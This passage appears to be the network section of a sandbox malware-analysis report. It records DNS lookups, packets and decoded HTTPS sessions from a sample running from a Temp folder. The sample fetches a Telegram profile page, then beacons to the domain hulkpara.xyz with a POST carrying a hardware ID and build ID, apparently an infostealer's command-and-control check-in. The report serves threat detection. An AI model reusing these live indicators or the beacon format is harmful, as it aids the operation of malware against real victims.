                                                                                                                                                                                                                                                                                          Dec 19, 2024 08:14:43.677582026 CET4435215323.49.251.8192.168.2.7
                                                                                                                                                                                                                                                                                          Dec 19, 2024 08:14:43.683013916 CET4435215323.49.251.8192.168.2.7
                                                                                                                                                                                                                                                                                          Dec 19, 2024 08:14:43.683032036 CET4435215323.49.251.8192.168.2.7
                                                                                                                                                                                                                                                                                          Dec 19, 2024 08:14:43.683096886 CET4435215323.49.251.8192.168.2.7
                                                                                                                                                                                                                                                                                          Dec 19, 2024 08:14:43.683283091 CET52153443192.168.2.723.49.251.8
                                                                                                                                                                                                                                                                                          Dec 19, 2024 08:14:43.692718983 CET52153443192.168.2.723.49.251.8
                                                                                                                                                                                                                                                                                          Dec 19, 2024 08:14:44.021330118 CET4435215323.49.251.8192.168.2.7
                                                                                                                                                                                                                                                                                          Dec 19, 2024 08:14:44.036931038 CET4435215323.49.251.8192.168.2.7
                                                                                                                                                                                                                                                                                          Dec 19, 2024 08:14:44.037020922 CET4435215323.49.251.8192.168.2.7
                                                                                                                                                                                                                                                                                          Dec 19, 2024 08:14:44.037115097 CET4435215323.49.251.8192.168.2.7
                                                                                                                                                                                                                                                                                          Dec 19, 2024 08:14:44.037199020 CET52153443192.168.2.723.49.251.8
                                                                                                                                                                                                                                                                                          Dec 19, 2024 08:14:44.043435097 CET52153443192.168.2.723.49.251.8
                                                                                                                                                                                                                                                                                          Dec 19, 2024 08:14:44.363415956 CET4435215323.49.251.8192.168.2.7
                                                                                                                                                                                                                                                                                          Dec 19, 2024 08:14:44.369966030 CET4435215323.49.251.8192.168.2.7
                                                                                                                                                                                                                                                                                          Dec 19, 2024 08:14:44.369983912 CET4435215323.49.251.8192.168.2.7
                                                                                                                                                                                                                                                                                          Dec 19, 2024 08:14:44.370064020 CET4435215323.49.251.8192.168.2.7
                                                                                                                                                                                                                                                                                          Dec 19, 2024 08:14:44.370276928 CET52153443192.168.2.723.49.251.8
                                                                                                                                                                                                                                                                                          Dec 19, 2024 08:14:44.377051115 CET52153443192.168.2.723.49.251.8
                                                                                                                                                                                                                                                                                          Dec 19, 2024 08:14:44.692028046 CET4435215323.49.251.8192.168.2.7
                                                                                                                                                                                                                                                                                          Dec 19, 2024 08:14:44.699873924 CET4435215323.49.251.8192.168.2.7
                                                                                                                                                                                                                                                                                          Dec 19, 2024 08:14:44.699891090 CET4435215323.49.251.8192.168.2.7
                                                                                                                                                                                                                                                                                          Dec 19, 2024 08:14:44.699907064 CET4435215323.49.251.8192.168.2.7
                                                                                                                                                                                                                                                                                          Dec 19, 2024 08:14:44.700149059 CET52153443192.168.2.723.49.251.8
                                                                                                                                                                                                                                                                                          Dec 19, 2024 08:14:44.706713915 CET52153443192.168.2.723.49.251.8
                                                                                                                                                                                                                                                                                          Dec 19, 2024 08:14:45.026324987 CET4435215323.49.251.8192.168.2.7
                                                                                                                                                                                                                                                                                          Dec 19, 2024 08:14:45.033520937 CET4435215323.49.251.8192.168.2.7
                                                                                                                                                                                                                                                                                          Dec 19, 2024 08:14:45.033536911 CET4435215323.49.251.8192.168.2.7
                                                                                                                                                                                                                                                                                          Dec 19, 2024 08:14:45.033551931 CET4435215323.49.251.8192.168.2.7
                                                                                                                                                                                                                                                                                          Dec 19, 2024 08:14:45.033802032 CET52153443192.168.2.723.49.251.8
                                                                                                                                                                                                                                                                                          Dec 19, 2024 08:14:45.040123940 CET52153443192.168.2.723.49.251.8
                                                                                                                                                                                                                                                                                          Dec 19, 2024 08:14:45.355424881 CET4435215323.49.251.8192.168.2.7
                                                                                                                                                                                                                                                                                          Dec 19, 2024 08:14:45.361609936 CET4435215323.49.251.8192.168.2.7
                                                                                                                                                                                                                                                                                          Dec 19, 2024 08:14:45.361637115 CET4435215323.49.251.8192.168.2.7
                                                                                                                                                                                                                                                                                          Dec 19, 2024 08:14:45.361648083 CET4435215323.49.251.8192.168.2.7
                                                                                                                                                                                                                                                                                          Dec 19, 2024 08:14:45.362008095 CET52153443192.168.2.723.49.251.8
                                                                                                                                                                                                                                                                                          Dec 19, 2024 08:14:45.368182898 CET52153443192.168.2.723.49.251.8
                                                                                                                                                                                                                                                                                          Dec 19, 2024 08:14:45.686781883 CET4435215323.49.251.8192.168.2.7
                                                                                                                                                                                                                                                                                          Dec 19, 2024 08:14:45.693517923 CET4435215323.49.251.8192.168.2.7
                                                                                                                                                                                                                                                                                          Dec 19, 2024 08:14:45.693547964 CET4435215323.49.251.8192.168.2.7
                                                                                                                                                                                                                                                                                          Dec 19, 2024 08:14:45.693581104 CET4435215323.49.251.8192.168.2.7
                                                                                                                                                                                                                                                                                          Dec 19, 2024 08:14:45.693917036 CET52153443192.168.2.723.49.251.8
                                                                                                                                                                                                                                                                                          Dec 19, 2024 08:14:45.705420971 CET52153443192.168.2.723.49.251.8
                                                                                                                                                                                                                                                                                          Dec 19, 2024 08:14:46.025728941 CET4435215323.49.251.8192.168.2.7
                                                                                                                                                                                                                                                                                          Dec 19, 2024 08:14:46.045068026 CET4435215323.49.251.8192.168.2.7
                                                                                                                                                                                                                                                                                          Dec 19, 2024 08:14:46.045212984 CET4435215323.49.251.8192.168.2.7
                                                                                                                                                                                                                                                                                          Dec 19, 2024 08:14:46.045407057 CET52153443192.168.2.723.49.251.8
                                                                                                                                                                                                                                                                                          Dec 19, 2024 08:14:46.045412064 CET4435215323.49.251.8192.168.2.7
                                                                                                                                                                                                                                                                                          Dec 19, 2024 08:14:46.045442104 CET4435215323.49.251.8192.168.2.7
                                                                                                                                                                                                                                                                                          Dec 19, 2024 08:14:46.079826117 CET52153443192.168.2.723.49.251.8
                                                                                                                                                                                                                                                                                          Dec 19, 2024 08:14:46.385124922 CET4435215323.49.251.8192.168.2.7
                                                                                                                                                                                                                                                                                          Dec 19, 2024 08:14:52.731056929 CET49287443192.168.2.7162.159.61.3
                                                                                                                                                                                                                                                                                          Dec 19, 2024 08:14:52.731241941 CET49287443192.168.2.7162.159.61.3
                                                                                                                                                                                                                                                                                          Dec 19, 2024 08:14:52.731556892 CET49287443192.168.2.7162.159.61.3
                                                                                                                                                                                                                                                                                          Dec 19, 2024 08:14:52.731705904 CET49287443192.168.2.7162.159.61.3
                                                                                                                                                                                                                                                                                          Dec 19, 2024 08:14:53.742335081 CET49287443192.168.2.7162.159.61.3
                                                                                                                                                                                                                                                                                          Dec 19, 2024 08:14:53.742335081 CET49287443192.168.2.7162.159.61.3
                                                                                                                                                                                                                                                                                          Dec 19, 2024 08:14:53.743000984 CET49287443192.168.2.7162.159.61.3
                                                                                                                                                                                                                                                                                          Dec 19, 2024 08:14:53.743058920 CET49287443192.168.2.7162.159.61.3
                                                                                                                                                                                                                                                                                          Dec 19, 2024 08:14:53.789139032 CET49287443192.168.2.7162.159.61.3
                                                                                                                                                                                                                                                                                          Dec 19, 2024 08:14:53.815900087 CET44349287162.159.61.3192.168.2.7
                                                                                                                                                                                                                                                                                          Dec 19, 2024 08:14:53.816236973 CET44349287162.159.61.3192.168.2.7
                                                                                                                                                                                                                                                                                          Dec 19, 2024 08:14:53.816587925 CET49287443192.168.2.7162.159.61.3
                                                                                                                                                                                                                                                                                          Dec 19, 2024 08:14:53.851486921 CET49287443192.168.2.7162.159.61.3
                                                                                                                                                                                                                                                                                          Dec 19, 2024 08:14:53.884159088 CET49287443192.168.2.7162.159.61.3
                                                                                                                                                                                                                                                                                          Dec 19, 2024 08:14:53.898307085 CET49287443192.168.2.7162.159.61.3
                                                                                                                                                                                                                                                                                          Dec 19, 2024 08:14:54.057018042 CET44349287162.159.61.3192.168.2.7
                                                                                                                                                                                                                                                                                          Dec 19, 2024 08:14:54.057040930 CET44349287162.159.61.3192.168.2.7
                                                                                                                                                                                                                                                                                          Dec 19, 2024 08:14:54.057491064 CET49287443192.168.2.7162.159.61.3
                                                                                                                                                                                                                                                                                          Dec 19, 2024 08:14:54.085820913 CET49287443192.168.2.7162.159.61.3
                                                                                                                                                                                                                                                                                          Dec 19, 2024 08:14:54.101469994 CET49287443192.168.2.7162.159.61.3
                                                                                                                                                                                                                                                                                          Dec 19, 2024 08:14:54.121179104 CET44349287162.159.61.3192.168.2.7
                                                                                                                                                                                                                                                                                          Dec 19, 2024 08:14:54.121206045 CET44349287162.159.61.3192.168.2.7
                                                                                                                                                                                                                                                                                          Dec 19, 2024 08:14:54.121222019 CET44349287162.159.61.3192.168.2.7
                                                                                                                                                                                                                                                                                          Dec 19, 2024 08:14:54.121463060 CET49287443192.168.2.7162.159.61.3
                                                                                                                                                                                                                                                                                          Dec 19, 2024 08:14:54.176359892 CET44349287162.159.61.3192.168.2.7
                                                                                                                                                                                                                                                                                          Dec 19, 2024 08:14:54.199145079 CET44349287162.159.61.3192.168.2.7
                                                                                                                                                                                                                                                                                          Dec 19, 2024 08:14:54.199475050 CET44349287162.159.61.3192.168.2.7
                                                                                                                                                                                                                                                                                          Dec 19, 2024 08:14:54.199804068 CET49287443192.168.2.7162.159.61.3
                                                                                                                                                                                                                                                                                          Dec 19, 2024 08:14:54.213329077 CET44349287162.159.61.3192.168.2.7
                                                                                                                                                                                                                                                                                          Dec 19, 2024 08:14:54.214095116 CET44349287162.159.61.3192.168.2.7
                                                                                                                                                                                                                                                                                          Dec 19, 2024 08:14:54.242106915 CET49287443192.168.2.7162.159.61.3
                                                                                                                                                                                                                                                                                          Dec 19, 2024 08:14:54.371728897 CET44349287162.159.61.3192.168.2.7
                                                                                                                                                                                                                                                                                          Dec 19, 2024 08:14:54.415677071 CET44349287162.159.61.3192.168.2.7
                                                                                                                                                                                                                                                                                          Dec 19, 2024 08:14:54.435463905 CET44349287162.159.61.3192.168.2.7
                                                                                                                                                                                                                                                                                          Dec 19, 2024 08:14:54.460963964 CET49287443192.168.2.7162.159.61.3

                                                                                                                                                                                                                                                                                          ICMP Packets

                                                                                                                                                                                                                                                                                          TimestampSource IPDest IPChecksumCodeType
                                                                                                                                                                                                                                                                                          Dec 19, 2024 08:13:54.677350998 CET192.168.2.71.1.1.1c29e(Port unreachable)Destination Unreachable
                                                                                                                                                                                                                                                                                          Dec 19, 2024 08:13:57.035322905 CET192.168.2.71.1.1.1c296(Port unreachable)Destination Unreachable

                                                                                                                                                                                                                                                                                          DNS Queries

                                                                                                                                                                                                                                                                                          TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                                                                                                                                                                                                                                                          Dec 19, 2024 08:12:59.274734020 CET192.168.2.71.1.1.10xb969Standard query (0)cvCCAtzStAgfHNw.cvCCAtzStAgfHNwA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                          Dec 19, 2024 08:13:16.087943077 CET192.168.2.71.1.1.10xba37Standard query (0)t.meA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                          Dec 19, 2024 08:13:18.190912008 CET192.168.2.71.1.1.10xa724Standard query (0)hulkpara.xyzA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                          Dec 19, 2024 08:13:33.970803022 CET192.168.2.71.1.1.10x24fStandard query (0)www.google.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                          Dec 19, 2024 08:13:33.970963955 CET192.168.2.71.1.1.10x9c64Standard query (0)www.google.com65IN (0x0001)false
                                                                                                                                                                                                                                                                                          Dec 19, 2024 08:13:48.854537964 CET192.168.2.71.1.1.10x39edStandard query (0)ntp.msn.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                          Dec 19, 2024 08:13:48.854794025 CET192.168.2.71.1.1.10xf8f8Standard query (0)ntp.msn.com65IN (0x0001)false
                                                                                                                                                                                                                                                                                          Dec 19, 2024 08:13:51.567929029 CET192.168.2.71.1.1.10x9934Standard query (0)bzib.nelreports.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                          Dec 19, 2024 08:13:51.568382978 CET192.168.2.71.1.1.10x5332Standard query (0)bzib.nelreports.net65IN (0x0001)false
                                                                                                                                                                                                                                                                                          Dec 19, 2024 08:13:52.360037088 CET192.168.2.71.1.1.10x310bStandard query (0)clients2.googleusercontent.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                          Dec 19, 2024 08:13:52.360225916 CET192.168.2.71.1.1.10x6044Standard query (0)clients2.googleusercontent.com65IN (0x0001)false
                                                                                                                                                                                                                                                                                          Dec 19, 2024 08:13:53.074254990 CET192.168.2.71.1.1.10x2fb3Standard query (0)chrome.cloudflare-dns.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                          Dec 19, 2024 08:13:53.074631929 CET192.168.2.71.1.1.10x1ea4Standard query (0)chrome.cloudflare-dns.com65IN (0x0001)false
                                                                                                                                                                                                                                                                                          Dec 19, 2024 08:13:53.075220108 CET192.168.2.71.1.1.10xd5a4Standard query (0)chrome.cloudflare-dns.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                          Dec 19, 2024 08:13:53.075397968 CET192.168.2.71.1.1.10x98e0Standard query (0)chrome.cloudflare-dns.com65IN (0x0001)false
                                                                                                                                                                                                                                                                                          Dec 19, 2024 08:13:53.097162962 CET192.168.2.71.1.1.10x4403Standard query (0)chrome.cloudflare-dns.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                          Dec 19, 2024 08:13:53.097378969 CET192.168.2.71.1.1.10x153Standard query (0)chrome.cloudflare-dns.com65IN (0x0001)false
                                                                                                                                                                                                                                                                                          Dec 19, 2024 08:13:56.650484085 CET192.168.2.71.1.1.10xc36Standard query (0)sb.scorecardresearch.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                          Dec 19, 2024 08:13:56.650703907 CET192.168.2.71.1.1.10x708cStandard query (0)sb.scorecardresearch.com65IN (0x0001)false
                                                                                                                                                                                                                                                                                          Dec 19, 2024 08:13:56.652445078 CET192.168.2.71.1.1.10xf08dStandard query (0)assets.msn.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                          Dec 19, 2024 08:13:56.652661085 CET192.168.2.71.1.1.10x8c47Standard query (0)assets.msn.com65IN (0x0001)false

                                                                                                                                                                                                                                                                                          DNS Answers

                                                                                                                                                                                                                                                                                          TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                                                                                                                                                                                                                                                          Dec 19, 2024 08:12:59.519468069 CET1.1.1.1192.168.2.70xb969Name error (3)cvCCAtzStAgfHNw.cvCCAtzStAgfHNwnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                          Dec 19, 2024 08:13:16.229360104 CET1.1.1.1192.168.2.70xba37No error (0)t.me149.154.167.99A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                          Dec 19, 2024 08:13:18.592995882 CET1.1.1.1192.168.2.70xa724No error (0)hulkpara.xyz94.130.191.168A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                          Dec 19, 2024 08:13:34.109833002 CET1.1.1.1192.168.2.70x24fNo error (0)www.google.com172.217.19.228A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                          Dec 19, 2024 08:13:34.110208035 CET1.1.1.1192.168.2.70x9c64No error (0)www.google.com65IN (0x0001)false
                                                                                                                                                                                                                                                                                          Dec 19, 2024 08:13:48.864556074 CET1.1.1.1192.168.2.70xf552No error (0)svc.ha-teams.office.commira-tmc.tm-4.office.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                          Dec 19, 2024 08:13:48.995167971 CET1.1.1.1192.168.2.70x39edNo error (0)ntp.msn.comwww-msn-com.a-0003.a-msedge.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                          Dec 19, 2024 08:13:48.996591091 CET1.1.1.1192.168.2.70xf8f8No error (0)ntp.msn.comwww-msn-com.a-0003.a-msedge.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                          Dec 19, 2024 08:13:49.402771950 CET1.1.1.1192.168.2.70xd2edNo error (0)bingadsedgeextension-prod-europe.azurewebsites.netssl.bingadsedgeextension-prod-europe.azurewebsites.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                          Dec 19, 2024 08:13:49.402771950 CET1.1.1.1192.168.2.70xd2edNo error (0)ssl.bingadsedgeextension-prod-europe.azurewebsites.net94.245.104.56A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                          Dec 19, 2024 08:13:49.529758930 CET1.1.1.1192.168.2.70xb1acNo error (0)bingadsedgeextension-prod-europe.azurewebsites.netssl.bingadsedgeextension-prod-europe.azurewebsites.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                          Dec 19, 2024 08:13:51.708271027 CET1.1.1.1192.168.2.70x5332No error (0)bzib.nelreports.netbzib.nelreports.net.akamaized.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                          Dec 19, 2024 08:13:51.801568031 CET1.1.1.1192.168.2.70x9934No error (0)bzib.nelreports.netbzib.nelreports.net.akamaized.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                          Dec 19, 2024 08:13:52.499181032 CET1.1.1.1192.168.2.70x310bNo error (0)clients2.googleusercontent.comgooglehosted.l.googleusercontent.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                          Dec 19, 2024 08:13:52.499181032 CET1.1.1.1192.168.2.70x310bNo error (0)googlehosted.l.googleusercontent.com172.217.17.65A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                          Dec 19, 2024 08:13:52.500315905 CET1.1.1.1192.168.2.70x6044No error (0)clients2.googleusercontent.comgooglehosted.l.googleusercontent.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                          Dec 19, 2024 08:13:53.215002060 CET1.1.1.1192.168.2.70x2fb3No error (0)chrome.cloudflare-dns.com162.159.61.3A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                          Dec 19, 2024 08:13:53.215002060 CET1.1.1.1192.168.2.70x2fb3No error (0)chrome.cloudflare-dns.com172.64.41.3A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                          Dec 19, 2024 08:13:53.215663910 CET1.1.1.1192.168.2.70x1ea4No error (0)chrome.cloudflare-dns.com65IN (0x0001)false
                                                                                                                                                                                                                                                                                          Dec 19, 2024 08:13:53.216192007 CET1.1.1.1192.168.2.70x98e0No error (0)chrome.cloudflare-dns.com65IN (0x0001)false
                                                                                                                                                                                                                                                                                          Dec 19, 2024 08:13:53.216553926 CET1.1.1.1192.168.2.70xd5a4No error (0)chrome.cloudflare-dns.com162.159.61.3A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                          Dec 19, 2024 08:13:53.216553926 CET1.1.1.1192.168.2.70xd5a4No error (0)chrome.cloudflare-dns.com172.64.41.3A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                          Dec 19, 2024 08:13:53.236780882 CET1.1.1.1192.168.2.70x153No error (0)chrome.cloudflare-dns.com65IN (0x0001)false
                                                                                                                                                                                                                                                                                          Dec 19, 2024 08:13:53.238658905 CET1.1.1.1192.168.2.70x4403No error (0)chrome.cloudflare-dns.com172.64.41.3A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                          Dec 19, 2024 08:13:53.238658905 CET1.1.1.1192.168.2.70x4403No error (0)chrome.cloudflare-dns.com162.159.61.3A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                          Dec 19, 2024 08:13:56.422903061 CET1.1.1.1192.168.2.70xa2b3No error (0)shed.dual-low.s-part-0035.t-0009.t-msedge.nets-part-0035.t-0009.t-msedge.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                          Dec 19, 2024 08:13:56.422903061 CET1.1.1.1192.168.2.70xa2b3No error (0)s-part-0035.t-0009.t-msedge.net13.107.246.63A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                          Dec 19, 2024 08:13:56.790715933 CET1.1.1.1192.168.2.70xc36No error (0)sb.scorecardresearch.com18.165.220.66A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                          Dec 19, 2024 08:13:56.790715933 CET1.1.1.1192.168.2.70xc36No error (0)sb.scorecardresearch.com18.165.220.57A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                          Dec 19, 2024 08:13:56.790715933 CET1.1.1.1192.168.2.70xc36No error (0)sb.scorecardresearch.com18.165.220.106A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                          Dec 19, 2024 08:13:56.790715933 CET1.1.1.1192.168.2.70xc36No error (0)sb.scorecardresearch.com18.165.220.110A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                          Dec 19, 2024 08:13:56.792058945 CET1.1.1.1192.168.2.70xf08dNo error (0)assets.msn.comassets.msn.com.edgekey.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                          Dec 19, 2024 08:13:56.792193890 CET1.1.1.1192.168.2.70x8c47No error (0)assets.msn.comassets.msn.com.edgekey.netCNAME (Canonical name)IN (0x0001)false

                                                                                                                                                                                                                                                                                          HTTP Request Dependency Graph

                                                                                                                                                                                                                                                                                          • t.me
                                                                                                                                                                                                                                                                                          • hulkpara.xyz
                                                                                                                                                                                                                                                                                          • www.google.com
                                                                                                                                                                                                                                                                                          • chrome.cloudflare-dns.com
                                                                                                                                                                                                                                                                                          • clients2.googleusercontent.com
                                                                                                                                                                                                                                                                                          • https:
                                                                                                                                                                                                                                                                                            • assets.msn.com
                                                                                                                                                                                                                                                                                            • c.msn.com
                                                                                                                                                                                                                                                                                            • sb.scorecardresearch.com
                                                                                                                                                                                                                                                                                            • browser.events.data.msn.com

                                                                                                                                                                                                                                                                                          HTTPS Connections

                                                                                                                                                                                                                                                                                          TimestampSource IPSource PortDest IPDest PortSubjectIssuerNot BeforeNot AfterJA3 SSL Client FingerprintJA3 SSL Client Digest
                                                                                                                                                                                                                                                                                          Dec 19, 2024 08:13:32.954413891 CET94.130.191.168443192.168.2.749717CN=hulkpara.xyz CN=E6, O=Let's Encrypt, C=USCN=E6, O=Let's Encrypt, C=US CN=ISRG Root X1, O=Internet Security Research Group, C=USWed Dec 18 13:29:55 CET 2024 Wed Mar 13 01:00:00 CET 2024Tue Mar 18 13:29:54 CET 2025 Sat Mar 13 00:59:59 CET 2027771,49196-49195-49200-49199-49188-49187-49192-49191-49162-49161-49172-49171-157-156-61-60-53-47-10,0-10-11-13-35-23-65281,29-23-24,037f463bf4616ecd445d4a1937da06e19
                                                                                                                                                                                                                                                                                          CN=E6, O=Let's Encrypt, C=USCN=ISRG Root X1, O=Internet Security Research Group, C=USWed Mar 13 01:00:00 CET 2024Sat Mar 13 00:59:59 CET 2027

                                                                                                                                                                                                                                                                                          HTTPS Proxied Packets

                                                                                                                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                          0192.168.2.749710149.154.167.994437416C:\Users\user\AppData\Local\Temp\325114\Miniature.com
                                                                                                                                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                          2024-12-19 07:13:17 UTC85OUTGET /k04ael HTTP/1.1
                                                                                                                                                                                                                                                                                          Host: t.me
                                                                                                                                                                                                                                                                                          Connection: Keep-Alive
                                                                                                                                                                                                                                                                                          Cache-Control: no-cache
                                                                                                                                                                                                                                                                                          2024-12-19 07:13:18 UTC511INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                          Server: nginx/1.18.0
                                                                                                                                                                                                                                                                                          Date: Thu, 19 Dec 2024 07:13:17 GMT
                                                                                                                                                                                                                                                                                          Content-Type: text/html; charset=utf-8
                                                                                                                                                                                                                                                                                          Content-Length: 12301
                                                                                                                                                                                                                                                                                          Connection: close
                                                                                                                                                                                                                                                                                          Set-Cookie: stel_ssid=e9869b8b87686704e9_6096942602176790318; expires=Fri, 20 Dec 2024 07:13:17 GMT; path=/; samesite=None; secure; HttpOnly
                                                                                                                                                                                                                                                                                          Pragma: no-cache
                                                                                                                                                                                                                                                                                          Cache-control: no-store
                                                                                                                                                                                                                                                                                          X-Frame-Options: ALLOW-FROM https://web.telegram.org
                                                                                                                                                                                                                                                                                          Content-Security-Policy: frame-ancestors https://web.telegram.org
                                                                                                                                                                                                                                                                                          Strict-Transport-Security: max-age=35768000
                                                                                                                                                                                                                                                                                          2024-12-19 07:13:18 UTC12301INData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 3e 0a 20 20 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 54 65 6c 65 67 72 61 6d 3a 20 43 6f 6e 74 61 63 74 20 40 6b 30 34 61 65 6c 3c 2f 74 69 74 6c 65 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2e 30 22 3e 0a 20 20 20 20 3c 73 63 72 69 70 74 3e 74 72 79 7b 69 66 28 77 69 6e 64 6f 77 2e 70 61 72 65 6e 74 21 3d 6e 75 6c 6c 26 26 77 69 6e 64 6f 77 21 3d 77 69 6e 64 6f 77 2e 70 61 72 65 6e 74 29 7b 77 69 6e 64 6f 77 2e 70 61 72 65 6e 74
                                                                                                                                                                                                                                                                                          Data Ascii: <!DOCTYPE html><html> <head> <meta charset="utf-8"> <title>Telegram: Contact @k04ael</title> <meta name="viewport" content="width=device-width, initial-scale=1.0"> <script>try{if(window.parent!=null&&window!=window.parent){window.parent


                                                                                                                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                          1192.168.2.74971194.130.191.1684437416C:\Users\user\AppData\Local\Temp\325114\Miniature.com
                                                                                                                                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                          2024-12-19 07:13:20 UTC232OUTGET / HTTP/1.1
                                                                                                                                                                                                                                                                                          User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36 OPR/116.0.0.0
                                                                                                                                                                                                                                                                                          Host: hulkpara.xyz
                                                                                                                                                                                                                                                                                          Connection: Keep-Alive
                                                                                                                                                                                                                                                                                          Cache-Control: no-cache
                                                                                                                                                                                                                                                                                          2024-12-19 07:13:21 UTC158INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                          Server: nginx
                                                                                                                                                                                                                                                                                          Date: Thu, 19 Dec 2024 07:13:20 GMT
                                                                                                                                                                                                                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                                          Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                          Connection: close
                                                                                                                                                                                                                                                                                          2024-12-19 07:13:21 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                          Data Ascii: 0


                                                                                                                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                          2192.168.2.74971294.130.191.1684437416C:\Users\user\AppData\Local\Temp\325114\Miniature.com
                                                                                                                                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                          2024-12-19 07:13:22 UTC324OUTPOST / HTTP/1.1
                                                                                                                                                                                                                                                                                          Content-Type: multipart/form-data; boundary=----TR9Z5XBSR1N7YU3OPPZ5
                                                                                                                                                                                                                                                                                          User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36 OPR/116.0.0.0
                                                                                                                                                                                                                                                                                          Host: hulkpara.xyz
                                                                                                                                                                                                                                                                                          Content-Length: 256
                                                                                                                                                                                                                                                                                          Connection: Keep-Alive
                                                                                                                                                                                                                                                                                          Cache-Control: no-cache
                                                                                                                                                                                                                                                                                          2024-12-19 07:13:22 UTC256OUTData Raw: 2d 2d 2d 2d 2d 2d 54 52 39 5a 35 58 42 53 52 31 4e 37 59 55 33 4f 50 50 5a 35 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 30 30 31 41 34 31 46 32 37 36 31 35 33 32 35 36 34 35 30 37 36 35 2d 61 33 33 63 37 33 34 30 2d 36 31 63 61 0d 0a 2d 2d 2d 2d 2d 2d 54 52 39 5a 35 58 42 53 52 31 4e 37 59 55 33 4f 50 50 5a 35 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 63 31 34 30 30 66 31 31 35 31 33 31 65 31 66 61 38 34 65 61 39 38 35 39 39 64 35 33 64 30 62 64 0d 0a 2d 2d 2d 2d 2d 2d 54 52 39 5a 35 58 42 53 52 31 4e 37 59 55 33 4f 50 50 5a 35 2d 2d 0d
                                                                                                                                                                                                                                                                                          Data Ascii: ------TR9Z5XBSR1N7YU3OPPZ5Content-Disposition: form-data; name="hwid"001A41F276153256450765-a33c7340-61ca------TR9Z5XBSR1N7YU3OPPZ5Content-Disposition: form-data; name="build_id"c1400f115131e1fa84ea98599d53d0bd------TR9Z5XBSR1N7YU3OPPZ5--
